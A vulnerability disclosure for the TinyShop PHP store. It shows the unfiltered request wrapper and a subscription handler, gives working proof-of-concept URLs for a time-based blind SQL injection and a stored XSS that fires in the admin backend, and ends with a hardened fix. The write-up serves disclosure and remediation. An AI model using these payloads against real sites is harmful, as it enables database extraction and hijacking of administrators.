TinyShop blind SQL injection and stored XSS at the same place
Parameters are not filtered, resulting in a SQL injection and a stored XSS in the backend at the same location.
Let's first look at how TinyShop handles the passed parameters:
/Framework/lib/util/request_class.php
```php
// Handles $_GET
public static function get() {
    $num = func_num_args();
    $args = func_get_args();
    if ($num == 1) {
        if (isset($_GET[$args[0]])) {
            if (is_array($_GET[$args[0]])) return $_GET[$args[0]];
            else return trim($_GET[$args[0]]);
        }
        return null;
    } else if ($num >= 2) {
        if ($args[1] != null) $_GET[$args[0]] = $args[1];
        else if (isset($_GET[$args[0]])) unset($_GET[$args[0]]);
    } else {
        return $_GET;
    }
}

// Handles $_POST in the same way
public static function post() {
    $num = func_num_args();
    $args = func_get_args();
    if ($num == 1) {
        if (isset($_POST[$args[0]])) {
            if (is_array($_POST[$args[0]])) return $_POST[$args[0]];
            else return trim($_POST[$args[0]]);
        }
        return null;
    } else if ($num >= 2) {
        if ($args[1] != null) $_POST[$args[0]] = $args[1];
        else if (isset($_POST[$args[0]])) unset($_POST[$args[0]]);
    } else {
        return $_POST;
    }
}

// Handles $_GET and $_POST together (POST takes precedence)
public static function args() {
    $num = func_num_args();
    $args = func_get_args();
    if ($num == 1) {
        if (isset($_POST[$args[0]])) {
            if (is_array($_POST[$args[0]])) return $_POST[$args[0]];
            else return trim($_POST[$args[0]]);
        } else {
            if (isset($_GET[$args[0]])) {
                if (is_array($_GET[$args[0]])) return $_GET[$args[0]];
                else return trim($_GET[$args[0]]);
            }
        }
        return null;
    } else if ($num >= 2) {
        if ($args[1] != null) {
            $_POST[$args[0]] = $args[1];
            $_GET[$args[0]] = $args[1];
        } else {
            if (isset($_GET[$args[0]])) unset($_GET[$args[0]]);
            if (isset($_POST[$args[0]])) unset($_POST[$args[0]]);
        }
    } else {
        return $_POST + $_GET;
    }
}
```
As the code above shows, the Req class only wraps $_GET and $_POST; apart from trim(), no filtering is performed.
The vulnerability is in /protected/controllers/index.php:
```php
public function Y() {
    $goods_id = Filter::int(Req::args('goods_id'));
    $email = Req::args('email');
    $mobile = Req::args('mobile'); // email and mobile are not filtered
    $model = new Model('mobily');
    $register_time = date('Y-m-d H:i:s');
    $info = array('status' => 'fail', 'msg' => 'You are not logged in and cannot subscribe to the arrival notification.');
    if (isset($this->user['id'])) {
        $time = date('Y-m-d H:i:s', strtotime('-3 Day'));
        $obj = $model->where('user_id=' . $this->user['id'] . ' and goods_id=' . $goods_id . ' and register_time>' . "'$time'")->find();
        if ($obj) {
            $info = array('status' => 'warning', 'msg' => 'You have already subscribed to the arrival notification for this product.');
        } else {
            $data = array(
                'user_id' => $this->user['id'],
                'goods_id' => $goods_id,
                'register_time' => $register_time,
                'email' => $email,
                'mobile' => $mobile
            );
            $last_id = $model->data($data)->insert(); // the unfiltered data is inserted into the database
            if ($last_id > 0) $info = array('status' => 'success', 'msg' => 'Subscription successful.');
            else $info = array('status' => 'fail', 'msg' => 'Subscription failed.');
        }
    }
    echo JSON::encode($info);
}
```
Injection:
Because the query result is not echoed and no error message is reported, time-based blind injection has to be used:
http://localhost/index.php?con=index&act=Y&goods_id=1&email=100',(if(substring(user(),1,1)=char(114),sleep(5),798)%23&mobile=1
If the first character of user() is 'r', the response is delayed by 5 seconds.
XSS:
http://localhost/index.php?con=index&act=Policy&goods_id=2&email=<script>alert('zxx');</script>&mobile=111
The administrator can view the arrival notifications in the backend, where the stored payload is rendered:
Solution:
Filter the email and mobile parameters before they are used in the query and before they are displayed in the backend.
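As an added example (not TinyShop's own code), the following hardened handler shows what filtering means for this endpoint: validate the two unfiltered parameters, bind them in the query, and encode them when the backend renders them. The `$pdo` connection, the `goods_notify` table name and the digits-only rule for mobile are assumptions.

```php
<?php
// Added example, not TinyShop code. Assumes a PDO connection and a table
// `goods_notify` with the columns used by the vulnerable handler (placeholder names).

// Validate the parameters the original handler passed through unfiltered.
function validate_subscription(array $req): ?array {
    $goods_id = filter_var($req['goods_id'] ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    $email    = filter_var(trim($req['email'] ?? ''), FILTER_VALIDATE_EMAIL);
    $mobile   = trim($req['mobile'] ?? '');
    // Assumed rule: a mobile number is 1-20 digits; anything else is rejected.
    if ($goods_id === false || $email === false || !preg_match('/^\d{1,20}$/', $mobile)) {
        return null;
    }
    return ['goods_id' => $goods_id, 'email' => $email, 'mobile' => $mobile];
}

// Bound parameters are sent separately from the SQL text, so a value such as
// 100',(if(...),sleep(5),...)# can never be parsed as part of the statement.
function subscribe(PDO $pdo, int $user_id, array $req): array {
    $v = validate_subscription($req);
    if ($v === null) {
        return ['status' => 'fail', 'msg' => 'Invalid subscription data.'];
    }
    $since = date('Y-m-d H:i:s', strtotime('-3 day'));
    $st = $pdo->prepare('SELECT id FROM goods_notify WHERE user_id = ? AND goods_id = ? AND register_time > ?');
    $st->execute([$user_id, $v['goods_id'], $since]);
    if ($st->fetch()) {
        return ['status' => 'warning', 'msg' => 'You have already subscribed to this arrival notification.'];
    }
    $st = $pdo->prepare('INSERT INTO goods_notify (user_id, goods_id, register_time, email, mobile) VALUES (?, ?, ?, ?, ?)');
    $ok = $st->execute([$user_id, $v['goods_id'], date('Y-m-d H:i:s'), $v['email'], $v['mobile']]);
    return $ok ? ['status' => 'success', 'msg' => 'Subscription successful.']
               : ['status' => 'fail', 'msg' => 'Subscription failed.'];
}

// Output encoding for the backend listing: stored values are escaped at render
// time, so a record written by any other path still cannot run as script.
function render_notify_row(array $row): string {
    $e = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<tr><td>' . $e($row['email']) . '</td><td>' . $e($row['mobile']) . '</td></tr>';
}

// The page's XSS payload is rejected as an email, and is neutralised if it is ever rendered.
$payload = "<script>alert('zxx');</script>";
var_dump(validate_subscription(['goods_id' => '2', 'email' => $payload, 'mobile' => '111']) === null); // bool(true)
echo render_notify_row(['email' => $payload, 'mobile' => '111']), "\n";
```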